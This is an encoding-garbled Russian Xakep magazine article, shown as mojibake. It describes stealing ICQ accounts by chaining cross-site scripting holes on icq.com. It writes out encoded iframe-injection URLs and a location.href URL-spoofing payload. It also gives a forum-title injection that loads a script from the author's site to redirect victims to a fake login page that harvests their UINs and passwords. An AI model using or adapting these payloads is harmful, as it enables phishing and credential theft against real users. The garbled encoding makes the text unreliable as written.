áúðчðть - Xakep Online
áúðчðть - Xakep Online
áúðчðть - Xakep Online
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
[XÀÊÅÐ 11 [83] 05 > ÂÇËÎÌ 062]<br />
Çàáûë ñêàçàòü, ÷òî ïðè ïîñòå ñîîáùåíèÿ,<br />
ðÿäîì ñî ñâîåé àâàòàðêîé, ìû èìååì<br />
2 ññûëêè, îäíà èç êîòîðûõ âåäåò â<br />
ïðîôàéë, óêàçàííûé â ñàìîì íà÷àëå<br />
ñòàòüè, à äðóãàÿ — â ïðîôàéë, íàõîäÿùèéñÿ<br />
ïðèìåðíî ïî ñëåäóþùåìó àäðåñó:<br />
www.icq.com/whitepages/about_me.phpui<br />
n=559822. Ñàìî ñîáîé, ýòîò ïðîôàéë òîæå<br />
äûðÿâûé :).<br />
[èäåÿ è äàëüíåéøèå èññëåäîâàíèÿ]<br />
Èäåÿ ìîÿ âûãëÿäåëà òàê: â ôîðóì<br />
êèäàåì ñîîáùåíèå ñî ñêðèïòîì, ðåäèðåêòÿùèì<br />
ïîëüçîâàòåëÿ ïîïàâøåãî ïîä âîçäåéñòâèå<br />
ýòîé CSS íà ñòðàíèöó ñ ôåéêîì,<br />
ðàñïîëîæåííûì íà ìîåì ñàéòå, êîòîðûé<br />
âûãëÿäèò, êàê ãëàâíàÿ ñòðàíèöà àâòîðèçàöèè<br />
íà ôîðóìå. Ïîëüçîâàòåëü ââîäèò<br />
ñâîè äàííûå è ïåðåõîäèò îïÿòü íà ôîðóì,<br />
òåì âðåìåíåì âñå ââåäåííûå èì äàííûå<br />
ñîõðàíÿþòñÿ ó ìåíÿ. Íî îäíî äåëî ñêàçàòü….<br />
Âåäü ïîëüçîâàòåëü ñðàçó ñïàëèò<br />
ïîääåëêó, åñëè â àäðåñíîé ñòðîêå áðàóçåðà<br />
áóäåò íàïèñàíî ÷òî-òî òèïà: http//panterka-zloy<br />
hacker.h15.ru/razvod.php. Òóò<br />
ìîæíî áûëî ïîéòè 2-ìÿ ïóòÿìè: èëè èñïîëüçîâàòü<br />
äëÿ îáìàíà url spoofing, èëè<br />
íàéòè åùå îäíó ïàññèâíóþ óÿçâèìîñòü<br />
(æåëàòåëüíî íà ñòðàíèöå àâòîðèçàöèè íà<br />
ôîðóì) è âñòðîèòü â íåå iframe, ÷åðåç êîòîðûé<br />
îòîáðàæàëñÿ áû ìîé ôåéê.<br />
ß ñáåãàë â íî÷íîé ìàãàçèí çà äâóìÿ áóòûëî÷êàìè<br />
ïèâêà è ïðèíÿëñÿ èñêàòü íîâûå<br />
CSS. Ïðîøëî 15 ìèí, è óæå áûëî âûäåëåíî<br />
3 ïàññèâíûõ óÿçâèìîñòè, îäíà èç<br />
êîòîðûõ íàõîäèëàñü èìåííî â ñòðàíèöå<br />
àâòîðèçàöèè. Âîò åå url ñ óæå âñòðîåííûì<br />
îïàñíûì ñêðèïòîì:<br />
www.icq.com/karma/login_page.phpde<br />
st=http%3A%2F%2Fwww.icq.com%2Fb<br />
oards%2F&sv=2&css=boards.css"><br />
Òåïåðü, ïåðåâåäÿ îñîáî ïàëåâíûå ìîìåíòû<br />
â uri êîäèðîâêó, ïîëó÷èì:<br />
www.icq.com/karma/login_page.phpdes<br />
t=http%3A%2F%2Fwww.icq.com%2Fboa<br />
rds%2F&sv=2&css=boards.css%22%3E<br />
%3Ciframe%2520src%3Dhttp%3A%2F%<br />
2Fmy_site%2Flogin.php%2520height%3<br />
D100%25%2520width%3D100%25<br />
ðèñ. 2: ñêðèïò â óÿçâèìîì ïîëå<br />
ðèñ.1: ýëåìåíòàðíûé îáõîä ôèëüòðà íà êîëè÷åñòâî<br />
ââîäèìûõ ñèìâîëîâ<br />
Êàê âèäèøü, ÿ ñîçäàë èôðåéì, â êîòîðîì<br />
áóäåò îòîáðàæàòüñÿ íàø ôåéê, ðàñïîëîæåííûé<br />
íà ìîåì ñàéòå, íî…íà äàííîé<br />
ñòðàíèöå (www.icq.com/ karma<br />
/login_page.php) îêàçàëîñü öåëûõ 3 óÿçâèìûõ<br />
ïàðàìåòðà, à ýòî îçíà÷àåò, ÷òî<br />
ìû áóäåì âèäåòü öåëûõ òðè 100% èôðåéìà,<br />
îòîáðàæàþùèõñÿ ñâåðõó âíèç.<br />
Êîíå÷íî, íå âñå ýòî çàìåòÿò, íî, íå æåëàÿ<br />
ðèñêîâàòü, ïðèøëîñü âçÿòü äðóãóþ<br />
óÿçâèìîñòü — â ôîðóìíîì ïîèñêîâèêå:<br />
www.icq.com/icq_preferences/sig_preview.phpsig=alert(document.co<br />
okie)<br />
Òóò ìåíÿ òîæå æäàëà íåóäà÷à — îãðàíè÷åíèå<br />
íà êîëè÷åñòâî ââîäèìûõ ñèìâîëîâ.<br />
 èòîãå, ÿ îñòàíîâèëñÿ íà 3 CSS. Âîò åå url ñ<br />
óæå îôîðìëåííûì iframe. Îïÿòü æå, çàøèôðîâàâ<br />
âñå ëèøíåå è íåêðàñèâîå, ïîëó÷èì:<br />
www.icq.com/icq_preferences/sig_preview.phpsig=%3Ciframe+src%3Dhttp%<br />
3A%2F%2Fmy_site%2Flogin.php+heigh<br />
t%3D100%25+width%3D100%25+scroll<br />
ing=no+frameborder=0%3E<br />
Âñå ïðîøëî óñïåøíî, ñêðèïò ëèøü íåìíîãî<br />
ïàëèòñÿ â title ñòðàíèöû, íî, â ïðèíöèïå,<br />
âñå îòëè÷íî.<br />
Äëÿ îáùåãî ðàçâèòèÿ ÿ ðåøèë ðàññìîòðåòü<br />
åùå îäèí âàðèàíò îáìàíà — url<br />
spoofing. Ýòà èäåÿ óæå ðàññìàòðèâàëàñü<br />
â æóðíàëå, à èìåííî ¹3 2004, ñòð.64,<br />
òàê ÷òî îñîáûõ ñëîæíîñòåé ó òåáÿ âûçâàòü<br />
íå äîëæíà. Äëÿ îñóùåñòâëåíèÿ<br />
ïîäñòàâû, íàäî ÷òîá ó æåðòâû â áðàóçåðå<br />
ñðàáîòàë òàêîé âîò êîä:<br />
location.href=unescape('http://w<br />
ww.icq.com|login.php%01@www.my_si<br />
te/login.php');<br />
Áðàóçåðîì äîëæåí áûòü íå îáíîâëåííûé<br />
îñåë. Ê ñîæàëåíèþ, â ïåðâîì àäðåñå<br />
ñêðèïòà, íåëüçÿ èñïîëüçîâàòü ñëýøè, ïîýòîìó<br />
ïðèøëîñü äîâîëüñòâîâàòüñÿ âåðòèêàëüíîé<br />
÷åðòîé. Õîòÿ, âîçìîæíî,<br />
òû ïðèäóìàåøü ÷òî-íèáóäü ïîêðàñèâåå :).<br />
[à òåïåðü î ñàìîì ôåéêå] À òóò íåò<br />
íè÷åãî ñëîæíîãî. Ïðîñòî ñîõðàíÿåì ñòðàíèöó<br />
àâòîðèçàöèè íà âèíò è íåìíîãî ïðàâèì,<br />
à èìåííî — èçìåíÿåì ïàðàìåòð<br />
ôîðìà äëÿ ïîñòèíãà ñîîáùåíèé<br />
íà www.linuxsucks.org<br />
action, óêàçûâàÿ âìåñòî www.icq.com/karma/login.php ñâîé<br />
ôàéë check.php. Ñàì æå check.php áóäåò âûãëÿäåòü òàê:<br />
[check.php]<br />
ðèñ.3: ìîè êóêèñû âî âñåé ñâîåé êðàñîòå<br />
<br />
Òåïåðü çàëüåì ýòè 2 ôàéëà, à òàêæå ôàéë logi.html, íà<br />
ñàéò ñ ïîääåðæêîé php (â äàííîì ñëó÷àå ýòî ìîé ñàéò —<br />
my_site). Âîò è âñå, ôåéê ãîòîâ! Íå çàáóäü òîëüêî âûñòàâèòü<br />
ïðàâèëüíûé chmod.<br />
[ñîáèðàåì âñå âîåäèíî] Òàê êàê óÿçâèìûé ïàðàìåòð<br />
Subject/Question íå ïðèíèìàë áîëåå 55 çíàêîâ, ïðèøëîñü<br />
ïðèáåãíóòü ê îäíîé õèòðîñòè. Â ôîðóìå ÿ ñîçäàë òåìó ñ çàãîëîâêîì<br />
">. Ïîòîì<br />
ñîçäàë ôàéë 1.js, â êîòîðûé ïîìåñòèë òàêóþ âîò ñòðîêó:<br />
location.href=unescape('http://www.icq.com|login.php%0<br />
1@www.my_site/login.php');<br />
èëè äëÿ ðàáîòû ñ èôðåéìîì:<br />
location.href='http://www.icq.com/icq_preferences/sig_pre<br />
view.phpsig=%3Ciframe+src%3Dhttp%3A%2F%2Fmy_si<br />
te%2Flogin.php+height%3D100%25+width%3D100%25+s<br />
crolling=no+frameborder=0%3E';<br />
Ðàçìåùåííûé íà ôîðóìå ñïëîèò ãðóçèë ñ ìîåãî ñàéòà<br />
ñêðèïò 1.js, êîòîðûé ðåäèðåêòèë âñåõ, êòî íàõîäèëñÿ íà<br />
äàííîé ñòðàíèöå ôîðóìà, íà ìîé ôåéê. Ïîëüçîâàòåëüæåðòâà,<br />
äóìàë, ÷òî ýòî ãëþê ôîðóìà è çàíîâî àâòîðèçèðîâàëñÿ,<br />
òåì ñàìûì, îñòàâëÿÿ ìíå ñâîè óèíû/ïðèìàðè<br />
è ïàðîëè, è ïîñëå ïîïàäàë îáðàòíî íà äîñêó êàê íè<br />
â ÷åì íå áûâàëî.<br />
Âîò è âñå. Òåïåðü çàäà÷à ñòîèò íàä òåì, êàê óäåðæàòü óêðàäåííûå<br />
óèíû ó ñåáÿ, íî çíàÿ óèí/ïðèìàðè è ïàðîëü, ýòî<br />
óæå íå ïðîáëåìà :).<br />
[ñàìûé äûðÿâûé ñàéò ãîäà :)] Ïîêà ïèñàë ñòàòüþ,<br />
â çàêðûòûõ è ïàáëèê ðàçäåëàõ àíòè÷àòà íà÷àëñÿ ãëîáàëüíûé<br />
ïîèñê áàãîâ â icq.com, è óæå ñåé÷àñ òàì åñòü î÷åíü<br />
èíòåðåñíûå ðàçðàáîòêè (ìíîæåñòâî ïàññèâíûõ CSS, äûðêè,<br />
ïîçâîëÿþùèå óãíàòü àéñèêüþøíîå ìûëî, è ò.ä.).<br />
 òî æå âðåìÿ, êîãäà ñòàòüÿ óæå áûëà äîïèñàíà, ìíîé áûëî<br />
íàéäåíî åùå íåñêîëüêî CSS íà icq.com. Òàê ÷òî äåëàé<br />
âûâîäû è ïðîäîëæàé èññëåäîâàíèÿ<br />
ìîé ôåéê, îòîáðàæåííûé ÷åðåç èôðåéì<br />
ìîé ôåéê, èñïîëüçóþùèé url-spoofing